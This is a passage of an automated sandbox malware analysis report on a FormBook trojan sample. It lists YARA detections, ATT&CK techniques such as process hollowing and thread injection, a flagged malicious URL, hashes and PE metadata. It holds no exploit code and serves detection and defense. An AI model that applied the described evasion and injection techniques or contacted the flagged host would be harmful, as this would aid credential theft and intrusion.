          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D443C GetVersion,11_2_011D443C
          Source: explorer.exe, 00000016.00000000.876265655.0000000005E6A000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.891009930.0000000005E6A000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection512Access Token Manipulation1Security Account ManagerSecurity Software Discovery261SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion41LSA SecretsVirtualization/Sandbox Evasion41SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection512Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery125Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 552852 Sample: Fp4grWelSC.exe Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 7 other signatures 2->40 10 Fp4grWelSC.exe 3 2->10         started        process3 file4 32 C:\Users\user\AppData\...\Fp4grWelSC.exe.log, ASCII 10->32 dropped 50 Tries to detect virtualization through RDTSC time measurements 10->50 52 Injects a PE file into a foreign processes 10->52 14 Fp4grWelSC.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 process9 19 cmd.exe 17->19         started        22 autochk.exe 17->22         started        signatures10 42 Self deletion via cmd delete 19->42 44 Modifies the context of a thread in another process (thread injection) 19->44 46 Maps a DLL or memory area into another process 19->46 48 Tries to detect virtualization through RDTSC time measurements 19->48 24 cmd.exe 1 19->24         started        26 explorer.exe 1 152 19->26         started        28 explorer.exe 124 19->28         started        process11 process12 30 conhost.exe 24->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Fp4grWelSC.exe30%VirustotalBrowse
          Fp4grWelSC.exe39%ReversingLabsWin32.Trojan.Generic
          Fp4grWelSC.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.Fp4grWelSC.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.Fp4grWelSC.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.Fp4grWelSC.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.Fp4grWelSC.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.comldW0%Avira URL Cloudsafe
          http://en.wV0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.fontbureau.comas0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.zhongyicts.com.cnew0%Avira URL Cloudsafe
          www.safetyeats.asia/pnug/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://crl.v0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.safetyeats.asia/pnug/true
          • Avira URL Cloud: malware
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.apache.org/licenses/LICENSE-2.0Fp4grWelSC.exe, 00000000.00000003.667689980.0000000005617000.00000004.00000001.sdmpfalse
            		high
            http://www.fontbureau.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
              		high
              http://www.fontbureau.com/designersGFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                		high
                http://www.galapagosdesign.com/Fp4grWelSC.exe, 00000000.00000003.676276050.0000000005646000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.676246333.0000000005646000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.comFFp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/?Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/bTheFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers?Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comldWFp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://en.wVFp4grWelSC.exe, 00000000.00000003.665336360.0000000005616000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.665368035.0000000005615000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.665301008.0000000005615000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.tiro.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                      		high
                      http://www.goodfont.co.krFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.carterandcone.comlFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.typography.netDFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comasFp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.founder.com.cn/cn/cTheFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.667467039.0000000005614000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnewFp4grWelSC.exe, 00000000.00000003.667875691.0000000005616000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/frere-user.htmlFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/cabarga.htmlFp4grWelSC.exe, 00000000.00000003.673630049.000000000564D000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fonts.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnFp4grWelSC.exe, 00000000.00000003.667875691.0000000005616000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.667936294.0000000005616000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.como.Fp4grWelSC.exe, 00000000.00000003.667936294.0000000005616000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comFp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.vexplorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/Fp4grWelSC.exe, 00000000.00000003.671658171.000000000564D000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.671734893.000000000564D000.00000004.00000001.sdmpfalse
                                  		high

                                  Contacted IPs

                                  No contacted IP infos

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:552852
                                  Start date:13.01.2022
                                  Start time:20:21:28
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 29s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Fp4grWelSC.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:32
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/1@0/0
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HDC Information:
                                  • Successful, ratio: 23.7% (good quality ratio 21.1%)
                                  • Quality average: 67.3%
                                  • Quality standard deviation: 33.4%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 30
                                  • Number of non-executed functions: 162
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, store-images.s-microsoft.com, s-ring.msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, arc.msn.com, t-ring.msedge.net
                                  • Execution Graph export aborted for target cmd.exe, PID 7036 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  20:22:31API Interceptor1x Sleep call for process: Fp4grWelSC.exe modified
                                  20:23:43API Interceptor172x Sleep call for process: explorer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fp4grWelSC.exe.log
                                  Process:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1310
                                  Entropy (8bit):5.345651901398759
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
                                  MD5:A9EFF9253CAF99EC8665E41D736DDAED
                                  SHA1:D95BB4ABC856D774DA4602A59DE252B4BF560530
                                  SHA-256:DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
                                  SHA-512:96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.294974785296935
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Fp4grWelSC.exe
                                  File size:595968
                                  MD5:0e99d13aafcc5e8fadc45d8b85336d9b
                                  SHA1:6573c9dd229e50981aa24128ad02a07e99805369
                                  SHA256:a15402c5f869a1c02421742c27dd71c2448bb037d391a6bf130be06b2f976e2f
                                  SHA512:d2c22cff7ad0e8ea73b4d6a82f732d5d4f10033598040d545f00711d5a9c10c2d78e5c5aa17c8cacf9434e361f4b947a33c4849e800e2f3df7b73245ecd69d5a
                                  SSDEEP:12288:IK777777777777YPLgd5c/MhOk1nFhLuxbW54Tz/9KOgKTZZtqIQ2x:IK777777777777YMd5cmOksxOeBEQjD
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%.a..............0..B..........^a... ........@.. ....................................@................................

                                  File Icon

                                  Icon Hash:d2fafaf2f2dadac4

                                  Static PE Info

                                  General

                                  Entrypoint:0x46615e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x61E025D6 [Thu Jan 13 13:15:02 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6610c0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x2d104.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x641640x64200False0.881544553683data7.74639201184IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc0x680000x2d1040x2d200False0.320323320637data5.73852496041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
